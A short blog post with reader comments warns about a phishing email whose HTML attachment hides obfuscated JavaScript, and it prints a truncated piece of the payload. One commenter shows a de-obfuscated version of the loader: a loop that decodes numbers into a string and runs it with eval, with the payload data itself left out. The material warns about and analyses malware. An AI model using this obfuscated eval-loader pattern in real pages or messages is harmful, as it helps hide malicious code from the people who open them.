Cool hack attempt …

This one was actually much harder to discern that it was a hack attempt until I looked at the payload in an editor.

Never EVER under any circumstances read HTML mail from a source you don’t trust … and I am getting ready to say, from anyone.

Here is a portion of the payload:


<script>try{n&=Math.floor;}catch(zxc){e=eval;m=Math;n="108..117..1260..1326..384...

Wow… Using Javascript against us. Fine. Disable Javascript.

Email content should NEVER EVER EVER have executable payloads. Get yourself a dropbox for that. They should NEVER EVER EVER include an HTML doc as an attachment.

Won’t even try this one in a VM. Anyone who wants to see the payload, drop me a note. In plain text.

Viewed 46048 times by 4420 viewers

3 thoughts on “Cool hack attempt …

  1. Yea just got this today from a phishing attempt from Amazon.Com. i think being on a Mac saved me somewhat,,, it was amazing timing within a few minutes of a Real Amazon order, i opened it with a notepad and found what you posted above, called Amazon and asked if they sent it to me,,they said no and asked me to forward it to them..not sure what it does but probably isnt good..

  2. I used a website to de-obfuscate the code to make it more readable.

    try {
    n &= Math.floor;
    } catch (zxc) {
    e = eval;
    m = Math;
    n = lots of numbers
    h = 2;
    s = “”;
    for (i = 0; i – 649 != 0; i = 1 + i) {
    k = i;
    s += String[“fromCharCode”](n[k] / (i – h * m.floor(i / h) + 12));
    }
    if (015 – 0xa === 3) if (window.document) e(s);

    Seems pretty weird gonna take a more closer look at it now since it has been simplified to break down the payload.

Comments are closed.